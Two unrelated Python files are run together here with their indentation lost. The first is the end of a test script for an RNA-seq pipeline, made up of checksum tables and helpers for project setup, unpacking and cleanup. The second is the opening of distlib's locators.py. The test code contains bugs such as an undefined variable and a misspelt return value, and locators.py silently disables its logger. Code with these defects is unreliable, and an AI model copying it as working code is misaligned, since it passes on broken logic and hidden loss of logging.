'bs_abundance_95.tsv': '79dd3f214fc8fd08adaf23961dc5d8f6',
'bs_abundance_96.tsv': '482814b4940dcd3ee2f03feddd896a08',
'bs_abundance_97.tsv': 'f432acf7ad7c20be481ec308b7892791',
'bs_abundance_98.tsv': 'e44d4ad64d333eff44a055b54939f4c9',
'bs_abundance_99.tsv': 'de385260f7a188acd56a1f553f62aa44',
'run_info.json': 'adfdcfd7130b3a9ce38d23b76136922f'},
'wt1': {'abundance.h5': '67374ad88215387b8e400d906c33a11d',
'abundance.tsv': 'a920335482da4f89ae2865d46288cf83',
'bs_abundance_0.tsv': '96fc5d32d69c292527d0897cc2f57ae8',
'bs_abundance_1.tsv': 'e31212f1ed6ae7efc10cc7d6e8e07d13',
'bs_abundance_10.tsv': '4b7177330a73f06006bc574e0600a525',
'bs_abundance_11.tsv': '4e3c32c7922a3872fafc9f29c3972021',
'bs_abundance_12.tsv': '23e63f09f3c215e9219b6842eb447ecd',
'bs_abundance_13.tsv': '860da002d353c5687dbddfb123deb225',
'bs_abundance_14.tsv': '58df6c57907fee1c0cb941c8a1a92433',
'bs_abundance_15.tsv': '4857568dfb7d1e3f3ed0c17fcbbe25c4',
'bs_abundance_16.tsv': '7b3c4595eaea03c8ae78ea1b97a4ec86',
'bs_abundance_17.tsv': 'd66694de5eb375bcdf1589fd5d6bf420',
'bs_abundance_18.tsv': '166789d723715d90f2a5dea0a7d8fdd0',
'bs_abundance_19.tsv': 'd7598fb27d0e4dafdc389c03e778ce8e',
'bs_abundance_2.tsv': '88bb15c2e1a0a9edd5ef1dc253d553db',
'bs_abundance_20.tsv': '19af541ae9c6bdfa1c5f8a064a4dc3b7',
'bs_abundance_21.tsv': 'aa951d6eb7753a5d74bdd6c69da78278',
'bs_abundance_22.tsv': '3b26a637f60112a0a98241b4a9cfd0de',
'bs_abundance_23.tsv': 'e4dcc0ecf9bdb8a99a2db59d2b4ba5b8',
'bs_abundance_24.tsv': '47513e39938673fbd20a0a13acd33510',
'bs_abundance_25.tsv': 'e89c6465f65c40d20f1b2b5de1a7581d',
'bs_abundance_26.tsv': '83a58c15826961ec251b742e35380bdf',
'bs_abundance_27.tsv': 'a7e87373c0a6a8f9d345493d73940802',
'bs_abundance_28.tsv': '9da4a17054065a0c42b0ee56c368d800',
'bs_abundance_29.tsv': 'faed0e037caec85e2b01893dfe657d97',
'bs_abundance_3.tsv': '72181c51ad10456ccd580ee29323eea5',
'bs_abundance_30.tsv': 'e0c5a4f96af92d1b71a75e63d6e581ea',
'bs_abundance_31.tsv': '4cd8f1a3d390a8f1ccb6b6402d907fe5',
'bs_abundance_32.tsv': '3977d9f86f92551a60ce9c9fe3a14af5',
'bs_abundance_33.tsv': '18ab770b77d3051a4ae492d80e37534b',
'bs_abundance_34.tsv': '67835db906b74d9f48204b1cfd9a4a03',
'bs_abundance_35.tsv': '73c86ff7494b06154e3ad3e22fb6a4e1',
'bs_abundance_36.tsv': '0b5b1ef90ad518907fc633a78b0de55d',
'bs_abundance_37.tsv': 'fcf28eeecdb12e126fe29c949d28061f',
'bs_abundance_38.tsv': 'a6ecd516c776b8758cdd9919fd8f0490',
'bs_abundance_39.tsv': '9481dc802ae167422444eb4a07a61b12',
'bs_abundance_4.tsv': '9dd2946ebf6b6d8535b544a746ba4e55',
'bs_abundance_40.tsv': '13cc784de3d78953381f6915fbc94210',
'bs_abundance_41.tsv': '8e70e46e1c0d92073b9dbaf1d1703800',
'bs_abundance_42.tsv': '0202cfc68e20785afe9e36e09f621d39',
'bs_abundance_43.tsv': '5faab1cd70583b0fd57314ce0863e3d0',
'bs_abundance_44.tsv': '6624c3b4409c48963454d6232b71f655',
'bs_abundance_45.tsv': '92b7fa4ee8081b46ec625341e68b1a3b',
'bs_abundance_46.tsv': '99aa2272c8248f75ef0b3258835fc651',
'bs_abundance_47.tsv': '255f563c31e56e821e5cfc0b655e57f0',
'bs_abundance_48.tsv': '3fc863b291a362c36fefff5ce39f3894',
'bs_abundance_49.tsv': '564df28a3a7611bde16c07762b25cc00',
'bs_abundance_5.tsv': '469c1a4d6e39a1c3f4a424029cb16118',
'bs_abundance_50.tsv': 'd70b23ee8203128ee4c6e478444e74ef',
'bs_abundance_51.tsv': '247869513215384686e3350148d1d631',
'bs_abundance_52.tsv': '3a699c60147c4d55308f9a89ccd81c37',
'bs_abundance_53.tsv': 'ed71663caece1b8cb70c3a34980af07a',
'bs_abundance_54.tsv': 'a1e078adb75288e6511a738fd26aac11',
'bs_abundance_55.tsv': '39b0c66b8834147065ae50e92b71910f',
'bs_abundance_56.tsv': 'fb6c02ede906ee95c1fe8722d2c64e39',
'bs_abundance_57.tsv': '954b8e6b74bf5da93e8015a3adf499bc',
'bs_abundance_58.tsv': '88c06d7b7435730d6b173a7ad6e80027',
'bs_abundance_59.tsv': '9468f789071ae4f255de469acf01cf15',
'bs_abundance_6.tsv': 'fd6317422b1da424e0b7f776dc29f54e',
'bs_abundance_60.tsv': '7700cab0b26f3ad81c41a9c020d3213e',
'bs_abundance_61.tsv': '4cf82ff6233ed3a2496d1c3c2e421da3',
'bs_abundance_62.tsv': '7e04fa0ad67365bc18e3dace56db3d9e',
'bs_abundance_63.tsv': '671b8054884cf6aea652701ed5d99e4e',
'bs_abundance_64.tsv': '905a3e2022512f8edb7553af77833270',
'bs_abundance_65.tsv': 'cf2e8e27264b31426ef405a2183c1403',
'bs_abundance_66.tsv': 'd65741a01e1969f3f12884d8b6b34201',
'bs_abundance_67.tsv': 'c49f8010856327eb5a95fb37583daac9',
'bs_abundance_68.tsv': '10b83ae2d50be6d9d4e8dac9087b277f',
'bs_abundance_69.tsv': 'd51b5e56e968e976b69502dc4ea2a6cb',
'bs_abundance_7.tsv': '88edd50cb06592b4888104aac9cc71ff',
'bs_abundance_70.tsv': '06a20f14f33bb79625031c65c87ffeac',
'bs_abundance_71.tsv': '393dd8e009842cc60263b0c0b5c27bae',
'bs_abundance_72.tsv': 'c6effd347964890cff3424d389c84118',
'bs_abundance_73.tsv': 'd5e92c285952be755e362eb8ef57da75',
'bs_abundance_74.tsv': '4b677adf2c1562b287b9d11977faf06f',
'bs_abundance_75.tsv': '82f69f07084cdff2cbf62ec21d064fca',
'bs_abundance_76.tsv': '2c39741d7f16da49ffb48e39666ac025',
'bs_abundance_77.tsv': '27ea383329683911fe43774f1d03d146',
'bs_abundance_78.tsv': '77fe28b15c7d3778cc19a8fb04ef4185',
'bs_abundance_79.tsv': '13785b16fc4312816e909b1c50473f4f',
'bs_abundance_8.tsv': 'eca744e67f137aa23c1bc58cb2149a37',
'bs_abundance_80.tsv': 'c0f510bb96ad29ca192c72a2a696f335',
'bs_abundance_81.tsv': 'b9a4725319e47e74942e01e99352d707',
'bs_abundance_82.tsv': '63cabd75732856fb5fef84fe287d2417',
'bs_abundance_83.tsv': '811dd40341d8a9260e9dbcbf6a98d6b8',
'bs_abundance_84.tsv': 'a5be8d2c78ad597ca64af3f022dc5eda',
'bs_abundance_85.tsv': 'a18a28209a3f2a89dab22d04834657a8',
'bs_abundance_86.tsv': 'cf8641f470badc5d9f042f92462602a5',
'bs_abundance_87.tsv': '0b7317f5f4640fa3750a2cc220e5faae',
'bs_abundance_88.tsv': 'a95eefd9131f8f70873f938c301b0c16',
'bs_abundance_89.tsv': '3d881a72f9a4b8778f7d624e76c3c874',
'bs_abundance_9.tsv': 'ed5c275dc08529a9c0ddbf7030a77209',
'bs_abundance_90.tsv': '3f41e205cb8ecf63bc6f5c2469d75e7e',
'bs_abundance_91.tsv': 'b6a2133ac23eb060c71451748ab754d3',
'bs_abundance_92.tsv': '038b732a2179c1573f2c2fa4ad785daa',
'bs_abundance_93.tsv': '12e76d073f5d1b91ae9d21ebf40bd450',
'bs_abundance_94.tsv': 'b0be763b46da7fdaae99910377895582',
'bs_abundance_95.tsv': '9d3214afae1ae645eafe9bbfd6d80af3',
'bs_abundance_96.tsv': '4f9f43d88694acc7c353212527b3fde6',
'bs_abundance_97.tsv': '91fc42c6f1523431dae8b606e5d04920',
'bs_abundance_98.tsv': 'cab22fd16259a30b63fcae4caa032bbb',
'bs_abundance_99.tsv': 'fbca271c5ef039cb100d9f42620d27f9',
'run_info.json': '0035a7317254484ae13e4abbc94cc195'},
'wt2': {'abundance.h5': 'e232795f2976fd6d6664d8ab8c9538b1',
'abundance.tsv': 'b69782d52210778f8a9a0a816ce43844',
'bs_abundance_0.tsv': 'ed4894029dcfe76a646aeeab95843950',
'bs_abundance_1.tsv': '987d1c134478b0ef1d6506448e395c4e',
'bs_abundance_10.tsv': 'ff4614a4b1ca9caae165a19e88aaa267',
'bs_abundance_11.tsv': '4f5cf41b665fdb79790786dc5a497e18',
'bs_abundance_12.tsv': '20270c0212ae9eaad109fc2dc5872722',
'bs_abundance_13.tsv': '7946ad9f0c9046bc14008d521c52e689',
'bs_abundance_14.tsv': '0095a3db660828ed8a4c34cc9a5309f7',
'bs_abundance_15.tsv': '8fce133c733c4a43581b4282898db681',
'bs_abundance_16.tsv': 'd1c094d4054f0b90454b9b90839ad7c5',
'bs_abundance_17.tsv': 'f709588b588a99be3502677b35e9b2c9',
'bs_abundance_18.tsv': 'd81cf0139d8ceb7e1fff85a9cbc37609',
'bs_abundance_19.tsv': '5ac8c1ce44223000fe79a48c7df60c73',
'bs_abundance_2.tsv': 'eb67249119b99f27a28e1f291785d14b',
'bs_abundance_20.tsv': 'cb32d8d89b69340f0d5b9eb22e27db3b',
'bs_abundance_21.tsv': 'd373042c398e5015eda7d7ec310348fb',
'bs_abundance_22.tsv': '3d14fdd3921a3cb1c8bf21c3bb0d3b31',
'bs_abundance_23.tsv': 'b6b45b3f3d7977cab9dc1701852ff592',
'bs_abundance_24.tsv': '97384ac2bb272bbe2b1922b1aaf226fb',
'bs_abundance_25.tsv': '1eecc3c00f613078f032490b48dffc2e',
'bs_abundance_26.tsv': '6cfcbd608be62a59a375a8ac6aa59390',
'bs_abundance_27.tsv': '26b175c77e7b5af09f8e4a606c87d5d1',
'bs_abundance_28.tsv': '498de67366eed1a737379b8c1f257929',
'bs_abundance_29.tsv': '4c0f837a126bc337456a3029611ba031',
'bs_abundance_3.tsv': '98a0c4ab81f5848074a283f2eedb873c',
'bs_abundance_30.tsv': '9a28a38dd946a1ac9faaea36724ed09c',
'bs_abundance_31.tsv': 'f70b195934610cbe465b659a096e8b55',
'bs_abundance_32.tsv': 'f0561d89cedf474274c90f9bfeba0249',
'bs_abundance_33.tsv': '2cdd2803925658f76d1d2be355d7945e',
'bs_abundance_34.tsv': 'be019e8bb9e27873c6eaf8175c6ec207',
'bs_abundance_35.tsv': 'b4d0ebc436c63f18bd62eebc30b574d7',
'bs_abundance_36.tsv': 'c30f08d0897ee79aa1e2749817c5f0a8',
'bs_abundance_37.tsv': '6e7ccff28324de078d1e520abbcde663',
'bs_abundance_38.tsv': 'a018c8fd11c4f961be7b5e7519d2d962',
'bs_abundance_39.tsv': 'ed11c0eea19ddb50c46c5b521ba87250',
'bs_abundance_4.tsv': 'bc61d9ec794df6485ead6a524779f971',
'bs_abundance_40.tsv': '03c716d0fa7332bc64ca7bcf08c7e5d0',
'bs_abundance_41.tsv': 'b46068257fb113085fbc317bac7f41e3',
'bs_abundance_42.tsv': '032a399e837838175e123d46d08d64ad',
'bs_abundance_43.tsv': '70a0e9c95b681ff62c4dc10c9f6a5c15',
'bs_abundance_44.tsv': 'e9669160334ffa2d6647f6a52a807483',
'bs_abundance_45.tsv': 'af3d478835d4ea545cae011d61f30741',
'bs_abundance_46.tsv': '72d733ea8f39e71e0674332ce2bbddae',
'bs_abundance_47.tsv': 'f9d0a68be163da5babe834d1c93c2f83',
'bs_abundance_48.tsv': '684aa0c30b11db2c22682c3677b82c3e',
'bs_abundance_49.tsv': '76e50ba661471e87fa37fe5196bdfc94',
'bs_abundance_5.tsv': '6bd8872e70a406e20d49c9f1b213f888',
'bs_abundance_50.tsv': 'd596f108ff9e392510c1505eae843ee6',
'bs_abundance_51.tsv': '18545ba91700bf560b2b86bacc844b10',
'bs_abundance_52.tsv': 'd8d4d60382c5e86acf45954a08540dd9',
'bs_abundance_53.tsv': '244896eb6d87bd94497e81e6a8696e85',
'bs_abundance_54.tsv': 'b4a51f105162b0061f8ac5a8927bf5dd',
'bs_abundance_55.tsv': 'c2aa7b78f0cd2a4b50350c43b1de071d',
'bs_abundance_56.tsv': '33844b313fed41bfa47d40a7b193bdd3',
'bs_abundance_57.tsv': 'caec566444decb89212e405854c29a14',
'bs_abundance_58.tsv': '98ead4ccca5fcf286e82b199f6cb59a5',
'bs_abundance_59.tsv': '250d19d073623f6a8ac9282343db93b1',
'bs_abundance_6.tsv': '8e1e340b446ea3081057fc460f59d900',
'bs_abundance_60.tsv': '05a8f7e8b1b40bd24470a9b15a717c26',
'bs_abundance_61.tsv': '3ee1520b3e68a2924eb4ea2aa03f59c3',
'bs_abundance_62.tsv': 'c1166e4b4b049af8d5e0aab935b31175',
'bs_abundance_63.tsv': 'ea3280d17d0746a3e999cc2cc8efdd3d',
'bs_abundance_64.tsv': 'fdbb2b8fd40f346cb2f3c3349b986d09',
'bs_abundance_65.tsv': 'b09401de9864515f07740ff76337a702',
'bs_abundance_66.tsv': '6e08bc60fa7e1678255f6b531e95cefa',
'bs_abundance_67.tsv': 'd222ac0c6804ead152d43e4498ad5699',
'bs_abundance_68.tsv': '87a8ca3f518ceac065d0649a3d1d4c7f',
'bs_abundance_69.tsv': '700efa44598d2a57b5eac7e75d7a3e20',
'bs_abundance_7.tsv': '81c428347d44b17c3e1ff435d29bd6e9',
'bs_abundance_70.tsv': '37a56b19a1353c3c3ff987c8313fa987',
'bs_abundance_71.tsv': '324d4c7dc6fb60d6ea0457f531678599',
'bs_abundance_72.tsv': 'b14aafc7dc83d7e4c75aa15fdc647d58',
'bs_abundance_73.tsv': '2b89bc39dd9d897c83ba3c81449f31f8',
'bs_abundance_74.tsv': '3fc2a89cd099fee4cc449390d384cf29',
'bs_abundance_75.tsv': '6bf44b2885854061888bb364208b8402',
'bs_abundance_76.tsv': 'c67ec79159ba5945ab5181902d32b005',
'bs_abundance_77.tsv': '1397dedf00c6b6c41cfa38dcd801f2a1',
'bs_abundance_78.tsv': 'd808ce2dc0461a596c03517b67d79284',
'bs_abundance_79.tsv': 'e3f19a4161f755f7a460206a908dee87',
'bs_abundance_8.tsv': '34ad9d78ee95754ddea0ad6535dc1df6',
'bs_abundance_80.tsv': '31e6140be25d8c741d89680a5d563f72',
'bs_abundance_81.tsv': 'c3a429a42fbad7c0835663174dc4519d',
'bs_abundance_82.tsv': '6c3305a08bbc7060cbde7efb6c901e54',
'bs_abundance_83.tsv': 'cf6d4b0086f391900c03a5284e1a75c3',
'bs_abundance_84.tsv': 'df87fbf8958d7c892cf0a88fa03cef0d',
'bs_abundance_85.tsv': '36a23b4d1c5dcb84a07168d62374f4e5',
'bs_abundance_86.tsv': '43a9bc6d30ae73d747b3e2bf38ca6bcc',
'bs_abundance_87.tsv': 'ec998fd68ab3805916531231a737ce14',
'bs_abundance_88.tsv': 'bf4f1e021c6f7660963cd8a973b4ebff',
'bs_abundance_89.tsv': 'f5e319974878e6d38c5c2ce01f4e7256',
'bs_abundance_9.tsv': 'dc7e0105eb37fbea3ce33472913ce379',
'bs_abundance_90.tsv': 'a237b6e87348de02c5afc164e509e6d0',
'bs_abundance_91.tsv': 'af23e932f3d82e3d67afd1cebfb50a37',
'bs_abundance_92.tsv': '7e7465582f48f1079a137e3f17d5250b',
'bs_abundance_93.tsv': '97838e5495c7279ef48d1e2f7881079c',
'bs_abundance_94.tsv': '69bd3c162deed5676dd3d225a46f3307',
'bs_abundance_95.tsv': 'c3bae60f126c12a9ee151df939c1660d',
'bs_abundance_96.tsv': 'e11b4fbde94a9d64548aea8314ada51b',
'bs_abundance_97.tsv': '442605a6f7d25e71664c8b6c026321e0',
'bs_abundance_98.tsv': 'b607723410c2bed4eb002f33741053b5',
'bs_abundance_99.tsv': '54a1593945a6da7d3d37d6cb2614ec42',
'run_info.json': 'ad2ba0be4210ad8ab9238a4817bc0308'}
}
md5s_list = md5s['mt1'].values() + md5s['mt2'].values() + md5s['wt1'].values() + md5s['wt2'].values()
new_md5s = {}
for root, dirs, files in os.walk('../../test_samples/aligned/'):
if not len(files) == 0:
folder = root.split('/')[-1]
new_md5s[folder] = {}
for fname in files:
md5 = md5_chksum('{}/{}'.format(root, fname))
print('{}: {}'.format(fname, md5))
new_md5s[folder][fname] = md5
assert md5s == new_md5s, 'MD5\'s do not match those in record!.'
for _id in ids:
for root, folders, files in os.walk('../../root/projects/{}/1_alignment'.format(_id)):
if len(folders) == 0:
for fname in files:
md5 = md5_chksum('{}/{}'.format(root, fname))
if md5 in md5s_list:
print('.', end='')
else:
print('\n{} not in list'.format(md5))
def read_quant(_id):
result = subprocess.check_output(['../../Request.sh', 'read_quant', '--id', _id])
result = result.decode('utf-8').strip()
def copy_reads_folder(_id):
os.rmdir('../../root/projects/{}/0_raw_reads'.format(_id))
shutil.copytree('../../test_samples/raw/minimum', '../../root/projects/{}/0_raw_reads/'.format(_id))
def copy_reads_archive(_id):
shutil.copy2('../../test_samples/raw/minimum.tar.gz', '../../root/projects/{}/0_raw_reads/minimum.tar.gz'.format(_id))
def copy_reads_multiple(_id):
os.rmdir('../../root/projects/{}/0_raw_reads'.format(_id))
shutil.copytree('../../test_samples/raw/multiple', '../../root/projects/{}/0_raw_reads/'.format(_id))
def test_unpacking(testn):
md5s = {'18844_CCGTCC_L001_R1_001aa.fastq.gz': 'd4eb3295777b6556988f772158f6eaee',
'18844_CCGTCC_L001_R1_002aa.fastq.gz': 'be800e0e845f528aef13a2427db9c28c',
'18844_CCGTCC_L001_R1_003aa.fastq.gz': '71b355c1d54ac7c15513fca4a5d09dcc',
'18844_CCGTCC_L002_R1_001aa.fastq.gz': '6d13e0c1844339fcb73f6efd321435ba',
'18844_CCGTCC_L002_R1_002aa.fastq.gz': 'fb42a29875358fda7bc9a3fbb1b26db6',
'18844_CCGTCC_L002_R1_003aa.fastq.gz': '006e33f74303d076b0e0dcb6d0563352',
'18845_GTCCGC_L001_R1_001aa.fastq.gz': '2cd48438b23f51a2807dd8173d022dd6',
'18845_GTCCGC_L001_R1_002aa.fastq.gz': '6356c494452e44696c66436bd437f473',
'18845_GTCCGC_L001_R1_003aa.fastq.gz': '9797c44857a9ed9b9540d0fd87bbfdf2',
'18845_GTCCGC_L002_R1_001aa.fastq.gz': 'aacca6b59e419e9814985aa44a0c76bb',
'18845_GTCCGC_L002_R1_002aa.fastq.gz': '9395e721461d3bb91a9945bfe77c17d1',
'18845_GTCCGC_L002_R1_003aa.fastq.gz': '63ad9c405c181ea74bdaf78ec85f7ed6',
'18841_AGTCAA_L001_R1_001aa.fastq.gz': '1e84587cf4d07cf3f9945656765f50aa',
'18841_AGTCAA_L001_R1_002aa.fastq.gz': '34f2ee199d90250019cde457f7f3af3b',
'18841_AGTCAA_L001_R1_003aa.fastq.gz': 'cb9a4a1d4bd792d29a0d6d73834d83a4',
'18841_AGTCAA_L002_R1_001aa.fastq.gz': '2d9b1c464bfabcea7fd021f0e07c60f6',
'18841_AGTCAA_L002_R1_002aa.fastq.gz': '71b3aeb73a909292b7a65a9f2eea6131',
'18841_AGTCAA_L002_R1_003aa.fastq.gz': 'e7403dd5536d9acf71065fc5ef9c89b1',
'18842_AGTTCC_L001_R1_001aa.fastq.gz': '4467221cbd918be2c6799d3ecbd73113',
'18842_AGTTCC_L001_R1_002aa.fastq.gz': '3679701aab7ae4ffe55ad8203813b284',
'18842_AGTTCC_L001_R1_003aa.fastq.gz': '32eedc6587834a18005fa31984910217',
'18842_AGTTCC_L002_R1_001aa.fastq.gz': '11b0a8f6c0e1e78907ef5d9c1513d93a',
'18842_AGTTCC_L002_R1_002aa.fastq.gz': '811bf0c7dd01e13792285d4e82a57637',
'18842_AGTTCC_L002_R1_003aa.fastq.gz': 'dc0b307190a6edabafe890e90c811aec'}
# calculate md5s
new_md5s = {}
for root, dirs, files in os.walk('../../test_samples/raw/minimum'):
for fname in files:
md5 = md5_chksum('{}/{}'.format(root, fname))
print('{}: {}'.format(fname, md5))
new_md5s[fname] = md5
assert md5s == new_md5s, 'MD5\'s do not match those in record!.'
print('***Start unarchiving test***')
projects = []
for i in range(testn):
print('**entire folder archived into one file {}***'.format(i))
projects.append(unpacking_sequence(lambda x : copy_reads_archive(x)))
for i in range(testn):
print('***unarchived & divided into folders {}***'.format(i))
projects.append(unpacking_sequence(lambda x : copy_reads_folder(x)))
for i in range(testn):
print('***multiple archives {}***'.format(i))
projects.append(unpacking_sequence(lambda x : copy_reads_multiple(x)))
return projcts
def unpacking_sequence(copy):
_id = new_proj()
print('\tNew project: {}'.format(_id))
copy(_id)
print('\tInfer samples')
result = infer_samples(_id, md5s)
if result:
print('\t{} passed the test'.format(_id))
else:
print('\t{} failed the test'.format(_id))
return _id
def remove_proj(_id):
shutil.rmtree('../../root/projects/{}'.format(_id))
def test_concurrency(workern, testn):
def work(testn, qu):
for i in range(testn):
_id = new_proj()
print('.', end='', flush=True)
qu.put(_id)
print('***concurrency***')
projects = queue.Queue()
threads = []
for i in range(workern):
t = Thread(target=work, args=(testn, projects,))
t.setDaemon(True)
threads.append(t)
for t in threads:
t.start()
for t in threads:
for i in range(testn):
remove_proj(projects.get())
print()
if __name__ == '__main__':
# testn = 10
# workern = 8
# test_concurrency(workern, testn)
# projects = test_unpacking(testn)
#
# for _id in projects:
# read_quant(_id)
wait = input("PRESS ENTER ONCE ALIGNMENTS ARE FINISHED.")
test_read_quant()
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__);logger.disabled=True
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug('Wheel not compatible: %s', path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at a "digests" dictionary
or keys of the form 'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
if 'digests' in info:
digests = info['digests']
for algo in ('sha256', 'md5'):
if algo in digests:
result = (algo, digests[algo])
break
if not result:
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
